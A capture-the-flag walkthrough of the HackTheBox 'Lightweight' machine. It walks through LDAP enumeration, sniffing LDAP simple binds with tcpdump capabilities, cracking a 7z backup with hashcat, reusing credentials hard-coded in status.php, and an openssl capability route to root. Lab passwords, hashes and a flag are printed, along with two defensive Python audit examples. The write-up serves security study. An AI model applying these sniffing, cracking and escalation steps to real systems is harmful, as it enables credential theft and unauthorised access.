# Lightweight

Tags: #Linux #Enumeration #LDAP #Wireshark #Pivoting

Explore is a medium-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/166) created by 0xEA31. In this post, my IP is 10.10.14.32 and the target IP is 10.129.95.236.

I liked this machine a lot; it is more than just researching a specific CVE. In the beginning the machine is open: you can get in without effort, and then you use various techniques to pivot between several users. It's good LDAP practice.

## Recon

First, we check whether the machine is alive, then do the classic reconnaissance to get some general information about the target.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.95.236

Pinging 10.129.95.236 with 32 bytes of data:
Reply from 10.129.95.236: bytes=32 time=144ms TTL=63
Reply from 10.129.95.236: bytes=32 time=148ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63

Ping statistics for 10.129.95.236:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 142ms, Maximum = 148ms, Average = 144ms
```

{% endcode %}

By the TTL, we assume that it is a Linux machine (TTL 63 is one hop away from the Linux default of 64).

* `-p- --open`: scan all 65535 ports and report only the open ones
* `-T5`: scan at maximum speed; a little bit noisy
* `-v`: verbose, return more information while scanning
* `-n`: no DNS resolution, faster

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -T5 -v -n 10.129.95.236 -oG Ports

Completed SYN Stealth Scan at 09:30, 258.48s elapsed (65535 total ports)
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
Not shown: 65273 filtered tcp ports (no-response), 259 filtered tcp ports (host-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 259.02 seconds
           Raw packets sent: 131004 (5.764MB) | Rcvd: 301 (20.480KB)
```

{% endcode %}

* `-sC`: run the default Nmap scripts
* `-sV`: return the versions of the services

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80,389 10.129.95.236 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 09:32 Pacific SA Standard Time
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds
```

{% endcode %}

Important information: the certificate gives the domain `lightweight.htb`; add it to your hosts file pointing at the target IP.

{% code title="Local Terminal" %}

```bash
$ whatweb http://10.129.95.236
http://10.129.95.236 [200 OK] Apache[2.4.6][mod_fcgid/2.3.9], Country[RESERVED][ZZ], 
HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16], 
IP[10.129.95.236], OpenSSL[1.0.2k-fips], PHP[5.4.16], Script, Title[Lightweight slider evaluation page - slendr], 
X-Powered-By[PHP/5.4.16]
```

{% endcode %}

* Browser: <http://10.129.95.236>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FXnGCSZrUJcLOV1U7cs4p%2Fimage.png?alt=media&#x26;token=6ac56cbc-c9e7-43ed-b41d-76c73b55ae2d" alt=""><figcaption><p>Website index</p></figcaption></figure>

So we will be blocked if we try brute force, and this applies to dictionary attacks too. At this point we have to explore the website through view-source (Ctrl+U).

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F1RlQcZFBH2IWHjRIwDiX%2Fimage.png?alt=media&#x26;token=0195a548-8e3e-41db-ade1-2959a6657932" alt=""><figcaption></figcaption></figure>

In the source code there is a `js/index.js`; it is always a good idea to open such paths in the browser, in case directory listing is enabled.

* Browser:         <http://10.129.95.236/js/index.js>

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F5TepZbjsyPloY8VVJpnz%2Fimage.png?alt=media\&token=e2738b4b-e058-4d2a-98f3-ba02fa2a0fa3)

Nothing relevant.

* Browser:         <http://10.129.95.236/js>

Directory listing is enabled, but there is nothing else there… OK, let's explore the website.

* Browser:         <http://10.129.95.236/info.php>
  * By clicking on INFO

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F675qMxe5U4hAxwNTdT9b%2Fimage.png?alt=media&#x26;token=16c2d26d-e909-4efc-9cd1-06b6b47a15c4" alt=""><figcaption></figcaption></figure>

* Browser:         <http://10.129.95.236/status.php>
  * By clicking on Status

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FixYRxQy4upH0SDJYLDEh%2Fimage.png?alt=media&#x26;token=bba7d29e-da7d-408f-ad8d-81a9bb47a2cd" alt=""><figcaption><p>Nothing relevant, just a warning.</p></figcaption></figure>

* Browser:       <http://10.129.95.236/user.php>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F4anOESHJRxcRt34OrnYq%2Fimage.png?alt=media&#x26;token=3a61857a-adc4-4ec3-bc7e-b30f42863495" alt=""><figcaption></figcaption></figure>

That is an interesting statement: **we can log in over SSH with our IP address as username and password.**

By hovering, we find a new URL, <http://10.129.95.236/reset.php>; it says it only resets our username and password, so nothing to worry about.

But first, LDAP enumeration.

### LDAP Enumeration

Running `locate .nse` in the terminal lists every Nmap script; here the goal is to run every LDAP-related script, so filter with `locate .nse | grep ldap`.

{% code title="Local Terminal" %}

```bash
nmap --script ldap-brute.nse,ldap-novell-getpass.nse,ldap-rootdse.nse,ldap-search.nse -p389 10.129.95.236 -oN LdapScan
```

{% endcode %}

```
Bug in ldap-brute: no string output.
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: lightweight htb
|         dc: lightweight
|     dn: cn=Manager,dc=lightweight,dc=htb
|         objectClass: organizationalRole
|         cn: Manager
|         description: Directory Manager
|     dn: ou=People,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: People
|     dn: ou=Group,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: Group
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         cn: ldapuser1
|         sn: ldapuser1
|         mail: ldapuser1@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1000
|         gidNumber: 1000
|         homeDirectory: /home/ldapuser1
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         cn: ldapuser2
|         sn: ldapuser2
|         mail: ldapuser2@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1001
|         gidNumber: 1001
|         homeDirectory: /home/ldapuser2
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser1
|         userPassword: {crypt}x
|         gidNumber: 1000
|     dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser2
|         userPassword: {crypt}x
|_        gidNumber: 1001
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       namingContexts: dc=lightweight,dc=htb
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.3.6.1.1.22
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.1466.20037
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|_      subschemaSubentry: cn=Subschema
```

There is a lot of information, but the passwords are not recoverable from it directly: the `userPassword` values are SHA-512 crypt hashes (`$6$`), and the `{crypt}x` values on the groups are only placeholders.
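What the anonymous search above really reveals is that the directory serves `userPassword` to unauthenticated binds, which turns the LDAP server into a free copy of `/etc/shadow`. The following is an added example, not code from the original write-up or from the machine: it parses the nmap `ldap-search` layout shown above (the sample is built from that output), reports every entry whose `userPassword` was readable and classifies the storage scheme, so a defender can spot the exposure in a scan report. On the server side the fix is an OpenLDAP ACL such as `access to attrs=userPassword by self write by anonymous auth by * none`.

```python
"""Audit an anonymous LDAP search result for leaked password material.

Added example for this write-up; not code from the original post or the box.
Input is the nmap ldap-search layout: lines prefixed with "|", a "dn:" line
opens an entry and indented "attribute: value" lines belong to it.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample in the nmap ldap-search layout, copied from the scan above.
SAMPLE = """\
| ldap-search:
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         dc: lightweight
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         objectClass: posixAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         userPassword: {crypt}x
|_        gidNumber: 1000
"""

# "|" or "|_" prefix, optional indent, then "name: value"
_ATTR = re.compile(r"^\|_?\s*([A-Za-z][\w-]*):\s*(.*)$")


def parse_ldap_search(text: str) -> List[Dict[str, List[str]]]:
    """Turn the script output into a list of entries (attribute -> list of values)."""
    entries: List[Dict[str, List[str]]] = []
    current = None
    for raw in text.splitlines():
        m = _ATTR.match(raw)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "dn":                      # a new entry starts here
            current = {"dn": [value]}
            entries.append(current)
        elif current is not None:            # lines before the first dn (Context:) are skipped
            current.setdefault(key, []).append(value)
    return entries


def hash_scheme(value: str) -> str:
    """Classify a userPassword value by its RFC 2307 scheme prefix and crypt(3) id."""
    m = re.match(r"^\{([A-Za-z0-9-]+)\}(.*)$", value, re.S)
    if not m:
        return "cleartext"                   # no {scheme} prefix: stored as-is
    scheme, body = m.group(1).upper(), m.group(2)
    if scheme == "CRYPT":
        if body in ("x", "*") or body.startswith("!"):
            return "crypt:placeholder"       # shadow marker or locked, not a hash
        for prefix, name in (("$6$", "sha512"), ("$5$", "sha256"), ("$1$", "md5"), ("$2", "bcrypt")):
            if body.startswith(prefix):
                return "crypt:" + name
        return "crypt:des" if len(body) == 13 else "crypt:unknown"
    return scheme.lower()                    # ssha, sha, md5, ...


def exposed_password_hashes(entries: List[Dict[str, List[str]]]) -> List[Tuple[str, str]]:
    """(dn, scheme) for every userPassword an anonymous bind was able to read."""
    return [(e["dn"][0], hash_scheme(v)) for e in entries for v in e.get("userPassword", [])]


def crackable_entries(entries: List[Dict[str, List[str]]]) -> List[str]:
    """DNs whose exposed value is real password material (offline-crackable), not a placeholder."""
    return [dn for dn, scheme in exposed_password_hashes(entries) if not scheme.endswith("placeholder")]


if __name__ == "__main__":
    parsed = parse_ldap_search(SAMPLE)
    for dn, scheme in exposed_password_hashes(parsed):
        print(f"{scheme:18} {dn}")
    print("needs ACL fix:", crackable_entries(parsed))
```

The `crackable_entries` list is what should be empty after the ACL change; re-running the same nmap script against the fixed server and feeding its output to this parser is a cheap regression check.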

## User Pivot

### SSH by using IP

Earlier, the website told us that it is possible to log in using our IP as username and password.

{% code title="Local Terminal" %}

```bash
ssh 10.10.14.32@10.129.95.236

[10.10.14.32@lightweight ~]$ whoami
10.10.14.32
```

{% endcode %}

And… we are in, and we even have a new home directory…

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ cd ..

$ ls -l
total 0
drwx------. 4 10.10.14.2  10.10.14.2   91 Nov 16  2018 10.10.14.2
drwx------. 4 10.10.14.32 10.10.14.32  91 May 26 15:04 10.10.14.32
drwx------. 2 127.0.0.1   127.0.0.1    62 Sep 27  2021 127.0.0.1
drwx------. 4 ldapuser1   ldapuser1   181 Sep 27  2021 ldapuser1
drwx------. 4 ldapuser2   ldapuser2   197 Sep 27  2021 ldapuser2
```

{% endcode %}

Are there more users? Judging by the permissions (drwx------), we cannot do anything with those directories… We need to go further.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ grep "sh$" /etc/passwd
root:x:0:0:root:/root:/bin/bash
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
127.0.0.1:x:1003:1003::/home/127.0.0.1:/bin/bash
10.10.14.32:x:1004:1004::/home/10.10.14.32:/bin/bash
```

{% endcode %}

Yes, those are users, perfect targets for User Pivoting.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ uname -a
Linux lightweight.htb 3.10.0-862.3.3.el7.x86_64 #1 SMP Fri Jun 15 04:15:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/os-release
NAME="CentOS Linux" # Nothing suspicious here.
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

```

{% endcode %}

It is necessary to get more information about the target.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ cd /

$ find -perm -4000 2>/dev/null | xargs ls -l
-rwsr-xr-x. 1 root root     52952 Apr 11  2018 ./usr/bin/at
-rwsr-xr-x. 1 root root     64240 Nov  5  2016 ./usr/bin/chage
-rws--x--x. 1 root root     24048 Apr 11  2018 ./usr/bin/chfn
-rws--x--x. 1 root root     23960 Apr 11  2018 ./usr/bin/chsh
-rwsr-xr-x. 1 root root     57576 Apr 11  2018 ./usr/bin/crontab
-rwsr-xr-x. 1 root root     32008 Apr 11  2018 ./usr/bin/fusermount
-rwsr-xr-x. 1 root root     78216 Nov  5  2016 ./usr/bin/gpasswd
-rwsr-xr-x. 1 root root     44320 Apr 11  2018 ./usr/bin/mount
-rwsr-xr-x. 1 root root     41776 Nov  5  2016 ./usr/bin/newgrp
-rwsr-xr-x. 1 root root     27832 Jun 10  2014 ./usr/bin/passwd
-rwsr-xr-x. 1 root root     27680 Apr 11  2018 ./usr/bin/pkexec
---s--x---. 1 root stapusr 203832 Apr 12  2018 ./usr/bin/staprun
-rwsr-xr-x. 1 root root     32184 Apr 11  2018 ./usr/bin/su
---s--x--x. 1 root root    143184 Apr 11  2018 ./usr/bin/sudo
-rwsr-xr-x. 1 root root     32048 Apr 11  2018 ./usr/bin/umount
-rwsr-xr-x. 1 root root     15432 Apr 11  2018 ./usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-sr-x. 1 abrt abrt     15432 Apr 27  2018 ./usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x---. 1 root dbus     58016 Apr 11  2018 ./usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root     11216 Apr 11  2018 ./usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root     36280 Apr 11  2018 ./usr/sbin/unix_chkpwd
-rws--x--x. 1 root root     40312 Jun  9  2014 ./usr/sbin/userhelper
-rwsr-xr-x. 1 root root     11288 Apr 11  2018 ./usr/sbin/usernetctl
```

{% endcode %}

The SUID list contains nothing critical: we cannot modify any of these files, and none of them gives us a temporary root shell.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep #Interesting...
```

{% endcode %}

### Network Capture

By checking capabilities we found tcpdump, which is interesting to play with, especially because we can trigger an account reset at **reset.php** and make the server talk to LDAP while we are listening.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ cd /tmp/

$ tcpdump -i any -w Capture.cap -v # Just a test, you can try "which tcpdump" too

$ rm Capture.cap
```

{% endcode %}

* `-i any`: capture on every interface
* `-w`: write the raw packets to the given file
* `-v`: verbose

That was just a test. Now the best option is to capture on the loopback interface, limited to the LDAP port, and analyse the capture locally with Wireshark.

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ tcpdump -i lo port 389 -w capture.cap -v
```

{% endcode %}

Now play with the website: navigate everywhere, press all the buttons and, most importantly, trigger reset.php.

Then download the capture.cap file and explore its content with Wireshark.

{% code title="Local Terminal" %}

```bash
$ scp 10.10.14.32@10.129.95.236:/tmp/capture.cap capture.cap
      # Password: 10.10.14.32
$ wireshark capture.cap
```

{% endcode %}

Open capture.cap in Wireshark and filter on the LDAP protocol. Then right-click a packet > Follow > TCP Stream.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FxnUNWGOEvyZCGDP69Gqk%2Fimage.png?alt=media&#x26;token=ed257060-4f1e-4dfb-9bf2-149b282fcef2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FV2SIxJ3ei3uXmfLhiyoS%2Fimage.png?alt=media&#x26;token=907b659a-ccb1-4ba4-80e5-cb8ff90d6641" alt=""><figcaption></figcaption></figure>

We have new information: {username: ldapuser2, password: 8bc8251332abe1d7f105d3e53ad39ac2}. Now return to the target terminal.
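The reason the credential is readable in the stream is the protocol itself: an LDAPv3 simple bind sends the DN and the password as plain BER octet strings, so anything that can see port 389 traffic (here, tcpdump with `cap_net_raw` on loopback) sees the password. The block below is an added example, not code from the original write-up or from the machine: a minimal BER encoder/decoder for the BindRequest from RFC 4511 that extracts what a capture exposes and ignores SASL binds and other operations. The "capture" is constructed with the encoder in the same file; the DN is the one from the directory above, the password is a made-up value. The defender's takeaway is that only LDAPS or StartTLS removes this, not filtering who may sniff.

```python
"""Decode LDAPv3 simple BindRequests (RFC 4511, BER) from raw TCP/389 payloads.

Added example for this write-up, not code from the original post. It shows
what the tcpdump/Wireshark step recovers: a simple bind over plain port 389
carries the DN and password as an OCTET STRING with no protection at all.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple


def ber_len(n: int) -> bytes:
    """BER length: short form below 128, long form (0x80|k, then k length bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(value)) + value


def ber_int(n: int) -> bytes:
    """Non-negative INTEGER, minimal two's complement (a leading 0x00 when the top bit is set)."""
    return tlv(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big"))


def encode_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] { version 3, name, simple [0] } }."""
    bind = ber_int(3) + tlv(0x04, dn.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, ber_int(message_id) + tlv(0x60, bind))


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, position just after this element)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                          # long form length
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


@dataclass
class SimpleBind:
    message_id: int
    version: int
    dn: str
    password: str


def decode_simple_bind(payload: bytes) -> Optional[SimpleBind]:
    """Credentials of a simple BindRequest, or None for any other LDAP operation."""
    tag, msg, _ = read_tlv(payload, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(msg, pos)
    if tag != 0x60:                           # e.g. 0x63 SearchRequest: nothing to extract
        return None
    _, ver, pos = read_tlv(op, 0)
    _, dn, pos = read_tlv(op, pos)
    auth_tag, cred, _ = read_tlv(op, pos)
    if auth_tag != 0x80:                      # [3] SASL: no cleartext password in this element
        return None
    return SimpleBind(int.from_bytes(mid, "big"), int.from_bytes(ver, "big"),
                      dn.decode(), cred.decode())


def credentials_in_capture(payloads: List[bytes]) -> List[Tuple[str, str]]:
    """Every (dn, password) that was sent as a simple bind in the given payloads."""
    found = []
    for p in payloads:
        b = decode_simple_bind(p)
        if b is not None:
            found.append((b.dn, b.password))
    return found


# Constructed traffic: a simple bind (what the web app does on the box), an
# unrelated SearchRequest-shaped message, and a SASL bind. Password is made up.
CAPTURE = [
    encode_simple_bind(1, "uid=ldapuser2,ou=People,dc=lightweight,dc=htb", "constructed-pw"),
    tlv(0x30, ber_int(2) + tlv(0x63, tlv(0x04, b"dc=lightweight,dc=htb"))),
    tlv(0x30, ber_int(3) + tlv(0x60, ber_int(3) + tlv(0x04, b"") + tlv(0xA3, tlv(0x04, b"GSSAPI")))),
]

if __name__ == "__main__":
    for dn, pw in credentials_in_capture(CAPTURE):
        print(f"simple bind exposed on the wire: {dn} / {pw}")
```

Feeding real payloads is a matter of extracting the TCP data of each port 389 packet (for example with a pcap library) and passing the bytes; a session that uses StartTLS yields only the ExtendedRequest and encrypted bytes, and `decode_simple_bind` finds nothing.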

{% code title="Target Terminal \[10.10.14.32]" %}

```bash
$ su - ldapuser2
Password: # 8bc8251332abe1d7f105d3e53ad39ac2

[ldapuser2@lightweight ~]$ cat user.txt
2f3954743b5446b603d25d0a8956c741
```

{% endcode %}

## Privileges Escalation

### User Pivot II

{% code title="Target Terminal \[ldapuser2]" %}

```bash
$ ls -l
total 1868
-rw-r--r--. 1 root      root         3411 Jun 14  2018 backup.7z
-rw-rw-r--. 1 ldapuser2 ldapuser2 1520530 Jun 13  2018 OpenLDAP-Admin-Guide.pdf
-rw-rw-r--. 1 ldapuser2 ldapuser2  379983 Jun 13  2018 OpenLdap.pdf
-rw-r--r--. 1 root      root           33 May 26 14:10 user.txt
```

{% endcode %}

Look what we found: a backup file. Transfer it using the target SSH terminal and a local terminal by copying all of the base64 content.

{% code title="Target Terminal \[ldapuser2]" %}

```bash
base64 -w 0 backup.7z ; echo
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
echo "<All the content>" | base64 -d > backup.7z
```

{% endcode %}

If you want, compare the md5sum in both terminals to check that the file is identical… now try to unpack it.

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSTkr9FjUvnoiPqAhe8rD%2Fimage.png?alt=media\&token=516251e0-e5d8-42c9-bea3-9bc85f592368)

{% code title="Local Terminal" %}

```bash
$ /usr/src/john/run/7z2john.pl backup.7z > hash
# If this fails, try: "apt-get install -y libcompress-raw-lzma-perl"

$ hashcat --example-hashes | grep -A 2 -B 2 7-Zip

Hash mode #11600
  Name................: 7-Zip
  Category............: Archive
  Slow.Hash...........: Yes
  
$ hashcat -m 11600 hash /usr/share/wordlists/rockyou.txt

$ vi hash
```

{% endcode %}

Delete the marked part from the file "hash" (the `backup.7z:` filename prefix that 7z2john prepends; hashcat only accepts the part starting at `$7z$`).

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSqblrz9VNDnFtiw6diG5%2Fimage.png?alt=media\&token=90d1cc47-9114-4a51-89ae-e9fbb2d21934)

{% code title="Local Terminal" %}

```bash
$ hashcat -m 11600 hash /usr/share/wordlists/rockyou.txt
```

{% endcode %}

![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FjJIoAR2IkpTdcgvj7OYS%2Fimage.png?alt=media\&token=b7fafee2-771d-4b8a-a2e5-6fe58b97b430)

Now that we have the archive password, we can extract the content of the webpage and explore all of it.

{% code title="Local Terminal" %}

```bash
$ 7z x backup.7z

$ cat index.php #Nothing
$ cat info.php #Nothing
$ cat reset.php #Nothing
$ cat status.php # :o
```

{% endcode %}

```php
<...>
<?php
$username = 'ldapuser1';
$password = 'f3ca9d298a553da117442deeb6fa932d';
$ldapconfig['host'] = 'lightweight.htb';
$ldapconfig['port'] = '389';
$ldapconfig['basedn'] = 'dc=lightweight,dc=htb';
//$ldapconfig['usersdn'] = 'cn=users';
$ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10);

$dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
<...>
```

New information: {username: ldapuser1, password: f3ca9d298a553da117442deeb6fa932d}. Now return to the target terminal.

{% code title="Target Terminal \[ldapuser2]" %}

```bash
[ldapuser2@lightweight ~]$ su - ldapuser1
Password:  # f3ca9d298a553da117442deeb6fa932d 

[ldapuser1@lightweight ~]$ whoami
ldapuser1
```

{% endcode %}

### Root

{% code title="Target Terminal \[ldapuser1]" %}

```bash
[ldapuser1@lightweight ~]$ id
uid=1000(ldapuser1) gid=1000(ldapuser1) groups=1000(ldapuser1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[ldapuser1@lightweight ~]$ sudo -l
[sudo] password for ldapuser1:
Sorry, user ldapuser1 may not run sudo on lightweight.

[ldapuser1@lightweight ~]$ getcap -r *
openssl =ep
tcpdump = cap_net_admin,cap_net_raw+ep
```

{% endcode %}

openssl carries file capabilities (`=ep`, every capability in the effective and permitted sets), so we can make use of it; go to <https://gtfobins.github.io/gtfobins/openssl/#file-read> and try the file-read primitive from there.
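Both `getcap` listings on this box (the system-wide one with tcpdump earlier, and the `openssl =ep` in ldapuser1's home just above) are the kind of thing a host audit should flag automatically. The following is an added example, not code from the original write-up or from the machine: it parses the two `getcap` output formats libcap has used (`path = caps+flags` / `path =ep` as shown on this page, and the newer `path caps=flags`), ranks each binary by what its capabilities let an unprivileged caller do, and sorts the worst first. The sample is built from the page's own lines plus one constructed line in the newer format; the severity classes are this example's own choice, not a standard.

```python
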